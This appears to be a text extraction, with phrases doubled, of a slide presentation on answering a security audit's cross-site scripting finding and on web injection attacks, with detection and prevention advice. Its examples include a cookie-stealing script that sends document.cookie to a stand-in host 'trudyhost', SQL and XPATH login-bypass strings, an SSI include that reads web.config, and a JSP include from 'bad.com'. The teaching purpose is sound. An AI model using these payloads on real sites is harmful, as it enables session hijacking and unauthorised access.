Web Audit Web Audit VulnerabilityVulnerability

cross-site scripting (XSS) cross-site scripting (XSS) concernsconcerns

by Ron Widitzby Ron Widitz

Business ProblemBusiness Problem

Independent security auditIndependent security audit Regulatory complianceRegulatory compliance XSS issue raisedXSS issue raised Must provide a responseMust provide a response

Audit ResponseAudit Response

Either:Either:– Prove issue to be a non-problemProve issue to be a non-problem

oror

– Describe actions to takeDescribe actions to take

Resolution StepsResolution Steps

Investigate security concernsInvestigate security concerns Restate as IT problem(s)Restate as IT problem(s) Determine solution(s)Determine solution(s) Provide audit responseProvide audit response Mitigate riskMitigate risk

InvestigationInvestigation

Define cross-site scripting (XSS)Define cross-site scripting (XSS) Examine how auditors appliedExamine how auditors applied Identify risksIdentify risks Research preliminary solutionsResearch preliminary solutions

cross-site scriptingcross-site scripting

Attacker goal: their code into Attacker goal: their code into browserbrowser

XSS forces a website to execute XSS forces a website to execute malicious code in browsermalicious code in browser

Browser user is the intended victimBrowser user is the intended victim Why? Account hijacking, keystroke Why? Account hijacking, keystroke

recording, intranet hacking, theft…recording, intranet hacking, theft…

XSS conceptXSS concept

Auditor findingAuditor finding

Freeform edit Freeform edit boxbox

Message to Message to Customer Customer ServiceService

XSS typesXSS types

Immediate reflection : phishingImmediate reflection : phishing DOM-based : 95 JavaScript methodsDOM-based : 95 JavaScript methods Redirection : header, meta, dynamicRedirection : header, meta, dynamic Multimedia : Flash, QT, PDF scriptsMultimedia : Flash, QT, PDF scripts Cross-Site Request Forgery (CSRF)Cross-Site Request Forgery (CSRF) others…others…

– (e.g. non-persistent search box)(e.g. non-persistent search box)

RisksRisks

XSS abuses render engines or XSS abuses render engines or plug-insplug-ins

Steal browser cookiesSteal browser cookies Steal session info for replay Steal session info for replay

attackattack Malware or bot installationMalware or bot installation Redirect or phishing attemptRedirect or phishing attempt

Our actual riskOur actual risk

Currently, none.Currently, none. Edit box info viewed in thick clientEdit box info viewed in thick client DHTML or JavaScript needs DHTML or JavaScript needs

browserbrowser Our thick client is Java Swing-Our thick client is Java Swing-

basedbased

Planned Audit Planned Audit ResponseResponse Could indicate “no audit problem”Could indicate “no audit problem” Might have future impactMight have future impact Address through dev standardsAddress through dev standards Consider application firewallConsider application firewall Widen problem scope to include Widen problem scope to include

all user agent injection tacticsall user agent injection tactics

More on Web AttacksMore on Web Attacks

Cross Site ScriptingCross Site Scripting SQL InjectionSQL Injection XPATH InjectionXPATH Injection LDAP InjectionLDAP Injection SSI (server side inclusion) SSI (server side inclusion)

InjectionInjection JSP (Java server pages) InjectionJSP (Java server pages) Injection

ArtifactsArtifacts

For each injection issue:For each injection issue:– Vulnerability description documentedVulnerability description documented– Preventative coding techniquePreventative coding technique

Discuss with App Dev teamsDiscuss with App Dev teams– Publish and socialize directionPublish and socialize direction– Include in peer reviews/code walkthroughsInclude in peer reviews/code walkthroughs– Set deadlines for full incorporationSet deadlines for full incorporation

Communicate with auditorsCommunicate with auditors

Cross Site Scripting Cross Site Scripting Example 1Example 1 Trudy posts the following JavaScript on Trudy posts the following JavaScript on

a message board:a message board: <SCRIPT><SCRIPT>

document.location='http://trudyhost/document.location='http://trudyhost/cgi-bin/cgi-bin/stealcookie.cgi?'+document.cookiestealcookie.cgi?'+document.cookie</SCRIPT></SCRIPT>

When Bob views the posted message, When Bob views the posted message, his browser executes the malicious his browser executes the malicious script, and his session cookie is sent to script, and his session cookie is sent to TrudyTrudy

Cross Site Scripting Cross Site Scripting Example 2Example 2

Trudy sends a link to the following URL to Bob Trudy sends a link to the following URL to Bob that will take him to a personalized page:that will take him to a personalized page:

http://host/personalizedpage.php?http://host/personalizedpage.php?username=<script>document.location='http:username=<script>document.location='http://trudyhost/cgi-bin///trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>stealcookie.cgi?'+document.cookie</script>

A page is returned that contains the malicious A page is returned that contains the malicious script instead of the username Bob, and script instead of the username Bob, and Bob’s browser executes the script causing his Bob’s browser executes the script causing his session cookie to be sent to Trudysession cookie to be sent to Trudy

Hex is often used in place of ASCII for the Hex is often used in place of ASCII for the JavaScript to make the URL less suspiciousJavaScript to make the URL less suspicious

Cross Site Scripting Cross Site Scripting DetectionDetection A client usually is not supposed to A client usually is not supposed to

send scripts to serverssend scripts to servers– If the server receives <SCRIPT>… or If the server receives <SCRIPT>… or

the hex equivalent in an incoming the hex equivalent in an incoming packet and that same script is sent packet and that same script is sent unsanitized in an outgoing packet or in unsanitized in an outgoing packet or in an outgoing SQL statement to the an outgoing SQL statement to the database, then an attack has occurreddatabase, then an attack has occurred

A sanitized script could look like A sanitized script could look like &ls;SCRIPT&gt;…&ls;SCRIPT&gt;…

SQL Injection ExampleSQL Injection Example Trudy accesses Bob’s website; in which he does Trudy accesses Bob’s website; in which he does

not validate input on his sign in formnot validate input on his sign in form– Runs a SQL statement like the following:Runs a SQL statement like the following:– SELECT * from Accounts where username = SELECT * from Accounts where username =

“USER_NAME” and password = “USER_PASS”;“USER_NAME” and password = “USER_PASS”; In the password field, she types as her password:In the password field, she types as her password:

– X” OR “x”=“xX” OR “x”=“x Manipulates the server into running the following Manipulates the server into running the following

SQL command:SQL command:– SELECT * from Accounts where username = SELECT * from Accounts where username =

“USER_NAME” and password=“X” OR “x”=“x”;“USER_NAME” and password=“X” OR “x”=“x”;– Selects all account informationSelects all account information

SQL Injection SQL Injection DetectionDetection To detect and prevent this at Bob’s To detect and prevent this at Bob’s

locationlocation– Log any traffic from Trudy to Bob Log any traffic from Trudy to Bob

containing form data containing a containing form data containing a quotation markquotation mark

– Match any outgoing SQL statements Match any outgoing SQL statements from Bob’s web server to his from Bob’s web server to his database server and verify that the database server and verify that the quotation marks Trudy supplied were quotation marks Trudy supplied were escapedescaped

– If they weren’t, take actionIf they weren’t, take action

XPATH Injection XPATH Injection ExampleExample Similar to SQL injectionSimilar to SQL injection Bob has a form that does not sanitize Bob has a form that does not sanitize

user-provided input before using it as part user-provided input before using it as part of an XPATH query::of an XPATH query::– string(//user[name/text()=’USER_NAME' and string(//user[name/text()=’USER_NAME' and

password/text()=’USER_PASS']/account/text())password/text()=’USER_PASS']/account/text()) Trudy again can provide the following Trudy again can provide the following

password to change the statement’s logic: password to change the statement’s logic: – X’ OR ‘x’=‘xX’ OR ‘x’=‘x– The statement thus selects the first accountThe statement thus selects the first account

LDAP Injection LDAP Injection ExampleExample Server using LDAP for authenticationServer using LDAP for authentication

– User name initialized, but then uses User name initialized, but then uses unchecked user input to create a queryunchecked user input to create a query

filter = "(uid=" + CStr(userName) + ")" ' filter = "(uid=" + CStr(userName) + ")" ' searching for the user entrysearching for the user entry

Attacker can exploit using special Attacker can exploit using special characterscharacters

http://example/ldapsearch.asp?user=*http://example/ldapsearch.asp?user=*

LDAP Injection LDAP Injection DetectionDetection Detection is based off of usage of Detection is based off of usage of

special LDAP charactersspecial LDAP characters– System monitors input for special System monitors input for special

characterscharacters– Either scrubs incoming input or Either scrubs incoming input or

watches for unescaped output watches for unescaped output passed to database serverpassed to database server

Detection approach is blackboxDetection approach is blackbox

SSI Injection ExampleSSI Injection Example

Bob has his server configured to use Bob has his server configured to use Server-Side IncludesServer-Side Includes

Trudy passes input with an SSI embeddedTrudy passes input with an SSI embedded

<!--#INCLUDE VIRTUAL="/web.config"--><!--#INCLUDE VIRTUAL="/web.config"--> SSI inserts malicious code into normal SSI inserts malicious code into normal

webpages upon next requestwebpages upon next request Future legitimate users get content Future legitimate users get content

containing the tainted code included by containing the tainted code included by the SSIthe SSI

SSI Injection DetectionSSI Injection Detection

Bob’s system needs SSI enabled, so Bob’s system needs SSI enabled, so he uses our system on local servershe uses our system on local servers– SSI code can be detected by its specific SSI code can be detected by its specific

formatformat HTML comment (<!-- -->) containing a HTML comment (<!-- -->) containing a

commandcommand

– SSI commands can be stripped on ingressSSI commands can be stripped on ingress– Can also deny outgoing packets that do Can also deny outgoing packets that do

not include SSI as inputted (means not include SSI as inputted (means successful execution)successful execution)

Detection approach is blackboxDetection approach is blackbox

JSP Injection ExampleJSP Injection Example

Similar to SSI injectionSimilar to SSI injection Bob has a portal server configured Bob has a portal server configured

to use dynamic code for templatesto use dynamic code for templates Trudy passes input with an Trudy passes input with an

embedded <jsp:include embedded <jsp:include “http://bad.com/1.jsp” >“http://bad.com/1.jsp” >

malicious code inserted into malicious code inserted into webpagewebpage

JSP Injection JSP Injection PreventionPrevention Prefer static include <%include …>Prefer static include <%include …> Don’t allow file inclusion outside of Don’t allow file inclusion outside of

server via Java2 Security policiesserver via Java2 Security policies Firewall rules to prevent outbound Firewall rules to prevent outbound

requests from serverrequests from server Input validation codingInput validation coding Choose portal software not Choose portal software not

requiring dynamic includes or code requiring dynamic includes or code executionexecution

Defense ApproachesDefense Approaches Web firewall/IDSWeb firewall/IDS

– ModSecurity for ApacheModSecurity for Apache– Commercial: SecureSphere from Commercial: SecureSphere from

ImperviaImpervia Static code analysisStatic code analysis

– Open source: NiktoOpen source: Nikto– Commercial: Commercial:

Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner N-stalkerN-stalker

Education on good codingEducation on good coding– HTML encoding on input (server-HTML encoding on input (server-

side)side)– Input validation/filteringInput validation/filtering

Q&AQ&A

Suggestions?Suggestions?

Backup SlidesBackup Slides

user agent injectionuser agent injection

StoredStored HTTP Response SplittingHTTP Response Splitting SQL InjectionSQL Injection XML InjectionXML Injection JSP Code InjectionJSP Code Injection LDAP InjectionLDAP Injection

ApproachesApproaches

Application firewallApplication firewall HTML encoding on input HTML encoding on input

(server-side)(server-side) Input validation/filteringInput validation/filtering Coding techniques with Coding techniques with

outputoutput Session key enforced to Session key enforced to

prevent CSRFprevent CSRF

XPATH Injection XPATH Injection DetectionDetection Again, our system can detect this Again, our system can detect this

by matching any submission by by matching any submission by Trudy containing a quotation Trudy containing a quotation mark against outbound XPATH mark against outbound XPATH queriesqueries

Correction can again be done by Correction can again be done by escaping any rogue quotation escaping any rogue quotation marks Trudy may have insertedmarks Trudy may have inserted

Detection approach is blackboxDetection approach is blackbox